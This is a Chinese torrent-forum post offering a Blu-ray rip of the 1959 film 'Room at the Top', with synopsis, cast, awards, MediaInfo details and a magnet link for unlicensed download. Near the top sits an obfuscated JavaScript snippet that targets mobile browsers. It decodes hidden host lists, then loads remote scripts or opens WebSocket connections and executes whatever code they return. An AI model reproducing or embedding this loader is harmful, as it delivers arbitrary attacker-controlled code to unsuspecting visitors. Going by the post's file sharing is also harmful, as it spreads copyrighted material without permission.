金屋泪[中文字幕].Room.at.the.Top.1959.1080p.BluRay.x265.10bit.FLAC.2.0 9.76GB

版主小s 1月前 305

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 金屋泪 / 上流社会
◎片  名 Room at the Top
◎年  代 1959
◎产  地 英国
◎类  别 剧情 / 爱情
◎语  言 英语
◎上映日期 1959
◎IMDb链接 https://www.imdb.com/title/tt0053226/
◎豆瓣评分 7.2/10 (541人评价)
◎豆瓣链接 https://movie.douban.com/subject/1293449/
◎片  长 USA: 115 分钟
◎导  演 杰克·克莱顿 Jack Clayton (id:1032645)
◎编  剧 约翰·布雷恩 John Braine (id:1001082)
       莫德凯·里奇勒 Mordecai Richler (id:1005513)
◎演  员 西蒙·西涅莱 Simone Signoret (id:1002731)
       劳伦斯·哈维 Laurence Harvey (id:1027888)
       赫敏·巴德利 Hermione Baddeley (id:1057171)
       劳伦斯·R·哈维 Laurence R. Harvey (id:1316273)
       海瑟·西尔斯 Heather Sears (id:1028183)
       Beatrice Varley Beatrice Varley (id:1150229)
       理查德·帕斯科 Richard Pasco (id:1133088)
       德莱娜·基德 Delena Kidd (id:1103080)
       唐纳德·沃尔菲 Donald Wolfit (id:1160944)
       Ambrosine Phillpotts Ambrosine Phillpotts (id:1130933)
       雷蒙德·亨特利 Raymond Huntley (id:1110564)
       John Westbrook John Westbrook (id:1162116)
       詹姆斯·伍尔夫 James Woolf (id:1301275)
       拉尔夫·布林顿 Ralph W. Brinton (id:1279326)

◎标  签 英国 / 爱情 / 1959 / 1950s / 英国电影 / 黑白 / 杰克·克莱顿 / 剧情

◎简  介
  乔(劳伦斯·哈维 Laurence Harvey 饰)出身卑微,为此,他一直感到十分自卑。可是,这样的乔却偏偏爱上了大企业家的女儿苏珊(海瑟·西尔斯 Heather Sears 饰),身份的巨大悬殊令这段感情注定得不到祝福。为了阻止这段感情,苏珊的父亲为苏珊安排了同她门当户对的结婚对象,乔为此感到万分屈辱。                                    
                                美艳的女演员爱丽丝(西蒙·西涅莱 Simone Signoret 饰)出现在了乔的身边,两人的关系逐渐亲密,可这任然无法填补乔内心的空虚。乔深知身份和地位的重要,为此,他重新回到了苏珊的身边,希望能够借此挤入上流社会,最终,苏珊的父亲拗不过女儿的执着,答应了这门婚事。惨遭抛弃的爱丽丝失去了全部的希望,与一场意外中不幸身亡。

◎获奖情况 (共10项)
  第32届奥斯卡金像奖 (1960)
  最佳影片(提名)
  最佳导演(提名)
   └──杰克·克莱顿 (id:1032645)
  最佳男主角(提名)
   └──劳伦斯·哈维 (id:1027888)
  最佳女主角
   └──西蒙·西涅莱 (id:1002731)
  最佳女配角(提名)
   └──赫敏·巴德利 (id:1057171)
  最佳改编剧本
   └──尼尔·佩特森 (id:1015302)

  第12届戛纳电影节 (1959)
  主竞赛单元 金棕榈奖(提名)
   └──杰克·克莱顿 (id:1032645)
  主竞赛单元 最佳女演员
   └──西蒙·西涅莱 (id:1002731)

  第17届金球奖 (1960)
  电影类 剧情片最佳女主角(提名)
   └──西蒙·西涅莱 (id:1002731)
  塞缪尔·戈尔德温奖

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 230425949584311437007452703810530508509 (0xAD5A6C72CECFCEA412F9765F48FEFEDD)

  4. Complete name                            : [email protected]DQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 9.76 GiB

  8. Duration                                 : 1 h 57 min

  9. Overall bit rate mode                    : Variable

  10. Overall bit rate                         : 11.9 Mb/s

  11. Encoded date                             : UTC 2021-09-02 14:53:58

  12. Writing application                      : mkvmerge v61.0.0 ('So') 64-bit

  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID                                       : 1

  16. Format                                   : HEVC

  17. Format/Info                              : High Efficiency Video Coding

  18. Format profile                           : Main [email protected]@Main

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 57 min

  21. Bit rate                                 : 11.4 Mb/s

  22. Width                                    : 1 800 pixels

  23. Height                                   : 1 080 pixels

  24. Display aspect ratio                     : 5:3

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 24.000 FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.244

  31. Stream size                              : 9.32 GiB (96%)

  32. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  33. Encoding settings                        : rc=crf / crf=20.2000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.70 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1800x1080 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  34. Default                                  : Yes

  35. Forced                                   : No


  36. Audio

  37. ID                                       : 2

  38. Format                                   : FLAC

  39. Format/Info                              : Free Lossless Audio Codec

  40. Codec ID                                 : A_FLAC

  41. Duration                                 : 1 h 57 min

  42. Bit rate mode                            : Variable

  43. Bit rate                                 : 434 kb/s

  44. Channel(s)                               : 2 channels

  45. Channel layout                           : L R

  46. Sampling rate                            : 48.0 kHz

  47. Frame rate                               : 11.719 FPS (4096 SPF)

  48. Bit depth                                : 16 bits

  49. Compression mode                         : Lossless

  50. Stream size                              : 364 MiB (4%)

  51. Writing library                          : libFLAC 1.2.1 (UTC 2007-09-17)

  52. Language                                 : English

  53. Default                                  : Yes

  54. Forced                                   : No


  55. Text #1

  56. ID                                       : 3

  57. ID in the original source medium         : 4609 (0x1201)

  58. Format                                   : PGS

  59. Muxing mode                              : zlib

  60. Codec ID                                 : S_HDMV/PGS

  61. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  62. Duration                                 : 1 h 55 min

  63. Bit rate                                 : 56.9 kb/s

  64. Count of elements                        : 3399

  65. Stream size                              : 47.2 MiB (0%)

  66. Title                                    : chs&eng

  67. Language                                 : Chinese

  68. Default                                  : Yes

  69. Forced                                   : No

  70. Original source medium                   : Blu-ray


  71. Text #2

  72. ID                                       : 4

  73. ID in the original source medium         : 4610 (0x1202)

  74. Format                                   : PGS

  75. Muxing mode                              : zlib

  76. Codec ID                                 : S_HDMV/PGS

  77. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  78. Duration                                 : 1 h 55 min

  79. Bit rate                                 : 57.4 kb/s

  80. Count of elements                        : 3399

  81. Stream size                              : 47.6 MiB (0%)

  82. Title                                    : cht&eng

  83. Language                                 : Chinese

  84. Default                                  : No

  85. Forced                                   : No

  86. Original source medium                   : Blu-ray


  87. Text #3

  88. ID                                       : 5

  89. ID in the original source medium         : 4611 (0x1203)

  90. Format                                   : PGS

  91. Muxing mode                              : zlib

  92. Codec ID                                 : S_HDMV/PGS

  93. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  94. Duration                                 : 1 h 55 min

  95. Bit rate                                 : 32.7 kb/s

  96. Count of elements                        : 3399

  97. Stream size                              : 27.1 MiB (0%)

  98. Title                                    : chs

  99. Language                                 : Chinese

  100. Default                                  : No

  101. Forced                                   : No

  102. Original source medium                   : Blu-ray


  103. Text #4

  104. ID                                       : 6

  105. ID in the original source medium         : 4612 (0x1204)

  106. Format                                   : PGS

  107. Muxing mode                              : zlib

  108. Codec ID                                 : S_HDMV/PGS

  109. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  110. Duration                                 : 1 h 55 min

  111. Bit rate                                 : 33.2 kb/s

  112. Count of elements                        : 3399

  113. Stream size                              : 27.5 MiB (0%)

  114. Title                                    : cht

  115. Language                                 : Chinese

  116. Default                                  : No

  117. Forced                                   : No

  118. Original source medium                   : Blu-ray


  119. Text #5

  120. ID                                       : 7

  121. ID in the original source medium         : 4608 (0x1200)

  122. Format                                   : PGS

  123. Muxing mode                              : zlib

  124. Codec ID                                 : S_HDMV/PGS

  125. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  126. Duration                                 : 1 h 55 min

  127. Bit rate                                 : 40.3 kb/s

  128. Count of elements                        : 3532

  129. Stream size                              : 33.2 MiB (0%)

  130. Title                                    : eng

  131. Language                                 : English

  132. Default                                  : No

  133. Forced                                   : No

  134. Original source medium                   : Blu-ray


  135. Menu

  136. 00:00:00.000                             : Chapter 01

  137. 00:13:32.208                             : Chapter 02

  138. 00:23:43.875                             : Chapter 03

  139. 00:36:27.500                             : Chapter 04

  140. 00:45:51.000                             : Chapter 05

  141. 00:54:00.541                             : Chapter 06

  142. 01:01:34.958                             : Chapter 07

  143. 01:12:59.833                             : Chapter 08

  144. 01:23:29.625                             : Chapter 09

  145. 01:33:29.458                             : Chapter 10

  146. 01:41:35.166                             : Chapter 11

  147. 01:51:49.000                             : Chapter 12



TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:FE4A3C249C10CED12F6D64CAC4F25B65041D2597
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回